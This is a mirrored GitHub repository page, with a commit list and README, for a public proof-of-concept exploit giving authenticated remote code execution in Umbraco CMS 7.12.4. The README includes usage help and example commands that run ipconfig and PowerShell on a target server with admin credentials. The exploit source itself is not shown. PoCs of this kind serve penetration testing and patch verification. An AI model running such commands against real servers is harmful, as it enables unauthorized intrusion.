GitXplorerGitXplorer
n

Umbraco-RCE

public
75 stars
40 forks
0 issues

Commits

List of commits on branch master.
Verified
397f119f4f2346eb06817f0061fad02e390930bb

add args

nnoraj committed 5 years ago
Verified
11db4573b264d495bb7233e584dc3d3778cbde62

Update README.md

nnoraj committed 5 years ago
Verified
adba4d0e893c366b53e19c6146f1422aff1d97b6

Update exploit.py

nnoraj committed 5 years ago
Verified
f75b429d13d798a03f4883b9bf55727ebedc6d78

Update README.md

nnoraj committed 5 years ago
Verified
2848a7f7d05a01cdf2d868ef8515259764d37cbb

Update README.md

nnoraj committed 5 years ago
Verified
c3f45e5c8d57f55ffc349fd0a05eb69e7abb4f92

Create exploit.py

nnoraj committed 5 years ago

README

The README file for this repository.

Umbraco RCE exploit / PoC

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

[EDB-49488] [PacketStorm] [WLB-2020080012]

Usage

$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

Examples:

$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Requirements

Example for ArchLinux:

pacman -S python-beautifulsoup4 python-requests

Example using pip:

pip3 install -r requirements.txt

Reference

This is a better re-write of EDB-ID-46153 using arguments (instead of harcoded values) and with stdout display.

Tested with python 3.8.